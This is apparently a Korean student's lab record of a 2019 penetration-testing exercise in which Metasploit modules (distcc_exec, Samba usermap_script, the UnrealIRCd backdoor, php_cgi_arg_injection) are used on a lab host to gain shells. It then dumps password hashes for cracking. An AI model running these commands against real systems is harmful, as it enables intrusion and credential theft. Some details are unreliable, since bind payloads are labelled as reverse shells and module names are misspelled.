[모의해킹] 유닉스/리눅스 기반의 운영체제 침투

! 이 포스트의 내용은 2019년 전공 강의에서 다룬 리눅스 보안 실습의 기록용이며, 이는 학습 목적으로만 사용되어야 합니다.

! 어떠한 경우에도 이러한 기술을 악용하거나 불법적인 활동에 사용해서는 안 됩니다.

 

! 모의 해킹과 관련된 실습은 합법적인 환경에서만 수행되어야 하며, 무단으로 다른 사람의 시스템에 접근하는 등의 행위는 법적인 문제로 이어질 수 있습니다. 이러한 기술을 사용할 때에는 항상 윤리적인 책임을 갖고 행동해야 합니다.

 

1️⃣ 대상 시스템 정보 수집

db_nmap -sT -sV -O 192.168.255.148

---

2️⃣ DistCC 원격 코드 실행 취약점을 이용한 침투

🔹 1. Metasploit 실행 후 익스플로잇 모듈 설정

msfconsole
use exploit/unix/misc/distcc_exec

 

📌 Metasploit의 ``distcc_exec`` 모듈을 이용해 취약한 리눅스 시스템을 해킹

• DistCC = 여러 대의 컴퓨터에서 코드를 빠르게 컴파일하기 위한 시스템
• 보안 인증 없이 원격 명령을 실행할 수 있는 취약점이 있어 해킹에 악용될 수 있음

✅ DistCC 특징

• 기본적으로 TCP ``3632``번 포트에서 실행
• 인증 없이 외부 명령 실행 가능
• 대부분의 배포판에서 root 권한이 아닌 일반 사용자 권한으로 실행됨

---

🔹 2. 필수 옵션 설정

set PAYLOAD cmd/unix/bind_ruby  # bind_ruby 기반 리버스 셸 사용
set RHOST 192.168.255.148  # 대상 IP 설정

• 공격 대상이 공격자의 IP(``LHOST``)로 연결을 시도하도록 설정
• ``cmd/unix/reverse_netcat`` → 대상 시스템에 Netcat을 이용해 공격자에게 연결 

---

🔹 3. 공격 실행

exploit

• 공격 실행 후 공격자의 4444번 포트로 연결 성공
• 원격 대상에서 셸이 실행됨

---

🔹 4. CMD 기반 셸을 Meterpreter로 업그레이드

Metaslpoit의 기본 ``cmd/unix/reverse_netcat`` 페이로드는 기능이 제한적이므로,

CMD 기반 셸을 백그라운드로 전환한 후 Meterpreter로 변환하여 진행

 

📌 현재 셸을 백그라운드로 보내기

• ``distcc_exec`` 익스플로잇으로 획득한 CMD 셸을 백그라운드로 이동
• ``Ctrl + Z`` 키를 눌러 현재 세션을 백그라운드로 전환

Ctrl + Z

• Metasploit 프롬프트에서 백그라운드로 전환됐는지 확인

sessions -l

• 현재 세션 ID 확인

---

📌 Meterpreter 변환

• ``Shell_to_merterpreter`` 모듈 실행
• 현재 활성화된 CMD 셸을 Meterpreter로 변환하는 모듈 사용

use post/multi/manage/shell_to_meterpreter

• 옵션 설정 (set 명령어)
• ``SESSION 1`` → 기존 CMD 셸을 변환할 세션 선택

set SESSION 1
exploit

• exploit 후 Meterpreter 세션이 성공적으로 열렸음

• 현재 활성화된 Meterpreter 세션 확인

sessions

• Meterpreter 세션(ID 2번)이 성공적으로 열림

---

🔹 5. Meterpreter 세션으로 전환

• Meterpreter 실행

sessions 2

---

3️⃣ 삼바 서비스의 구조적 취약점을 이용한 침투

Samba는 Linux/Unix 환경에서 Windows와 파일 공유를 제공하는 서비스다.

이 서비스에서 발생하는 취약점을 악용하면 원격 코드 실행(RCE)을 통해 시스템을 장악 가능하다.

 

🔹 1. 익스플로잇 모듈 설정

use exploit/multi/samba/usermap_script

🔹 2. 필수 옵션 설정

set PAYLOAD cmd/unix/bind_ruby  # bind_ruby 기반 리버스 셸 사용
set RHOST 192.168.255.148  # 대상 IP 설정

🔹 3. 공격 실행

exploit

• 공격 실행 후 공격자의 4444번 포트로 연결 성공
• 원격 대상에서 셸이 실행됨

🔹 4. Meterpreter 세션으로 전환

use multi/manage/shell_to_merterprter
set session 2
exploit

sessions 3

 

---

🔹 5. 네트워크 정보 수집(enum_network)

``enum_network``는 침투한 시스템의 네트워크 인터페이스, 연결된 네트워크, 라우팅 테이블 정보를 수집하는 모듈이다.

이를 통해 내부 네트워크 구조를 파악하고 추가적인 공격 대상을 찾을 수 있다.

• 실행 방법

run post/linux/gather/enum_network

• 실행 결과

• 대상 시스템의 IP 주소, MAC 주소, 게이트웨이 정보 확인
• 현재 활성화된 네트워크 연결(ESTABLISHED 상태의 세션 포함) 확인
• 라우팅 테이블 확인 → 추가적인 네트워크 탐색 가능

---

🔹 6. 보안 설정 정보 수집 (enum_protections)

``enum_protections``은 대상 시스템의 보안 메커니즘(ASLR, SELinux, 방화벽 설정 등)을 분석하는 기능을 한다

이를 통해 권한 상승 공격 가능성을 평가할 수 있다.

• 실행 방법

run post/linux/gather/enum_protections

• 실행 결과

• ASLR(메모리 랜덤화) 활성 여부 확인 → 메모리 익스플로잇 가능성 분석

---

🔹 7. hashdump 모듈 사용

``hashdump``는 Linux 시스템의 사용자 계정 정보 및 암호 해시를 추출하는 모듈이다.

추출한 해시는 패스워드 크래킹 도구(John the Ripper, Hashcat)로 분석할 수 있다.

• 실행 방법

run post/linux/gather/hashdump

• 실행 결과

• Linux 사용자 계정과 암호 해시(SHA-512) 추출 성공!
• Hashcat이나 John the Ripper를 사용해 크래킹 가능

---

4️⃣ UnrealIRCd 백도어를 이용한 침투

UnrealIRCd 3.2.8.1 버전에는 기본적으로 백도어가 내장되어 있어서, 이를 이용해 원격 코드 실행을 할 수 있다.

Metasploit에 있는 ``unreal_ircd_3281_backdoor`` 모듈을 사용하면 쉽게 공격할 수 있다.

🔹 1. 익스플로잇 모듈 설정

use exploit/unix/irc/unreal_ircd_3281_backdoor

---

🔹 2. 필수 옵션 설정

set PAYLOAD cmd/unix/bind_ruby  # bind_ruby 기반 리버스 셸 사용
set RHOSTS 192.168.255.148  # 대상 IP 설정

---

🔹 3. 공격 실행

exploit

• 공격 실행 후 공격자의 4444번 포트로 연결 성공
• 원격 대상에서 셸이 실행됨

---

🔹 4. 웹 애플리케이션 정보 추출 (WhatWeb)

``whatweb``은 웹 애플리케이션의 정보를 자동으로 추출하는 도구로, 웹 서버가 사용하는 소프트웨어와 관련된 중요한 정보를 확인할 수 있다. 

이 도구는 서버에서 사용하 웹 서버 소프트웨어, CMS, 플러그인, 프레임워크 등을 식별 할 수 있다.

이를 통해 서버에 탑재된 웹 애플리케이션 버전, 취약점, 공격 대상 등을 파악할 수 있다.

• 실행 방법

whatweb http://192.168.255.148

• 실행 결과

• 웹 서버: Apache 2.2.8 (Ubuntu)
• PHP 버전: PHP 5.2.4-2 ubuntu5.10 → 후속 공격 4️⃣

---

4️⃣ php 5.4.2 미만 버전의 취약점을 이용한 침투

Whatweb을 통해 확인된 PHP 5.2.4 버전의 취약점을 이용한 침투방법이다.

``php_cgi_arg_injection`` 모듈은 PHP CGI에서 발생할 수 있는 Argument Injection을 악용하는 공격을 수행한다.

이 취약점은 PHP CGI가 사용자 입력을 제대로 검증하지 않거나 필터링하지 않아서 발생한다.

이때 공격자는 이를 이용해 원격 코드 실행을 유도할 수있다.

🔹 1. 익스플로잇 모듈 설정

use exploit/multi/http/php_cgi_arg_injection

 

🔹 2. 필수 옵션 설정

set PAYLOAD php/bind_php  # Meterpreter 리버스 셸 설정
set RHOST 192.168.255.148  # 대상 IP 설정

 

🔹 3. 공격 실행

exploit

• 공격 실행 후 공격자의 4444번 포트로 연결 성공
• 원격 대상에서 셸이 실행됨

 

---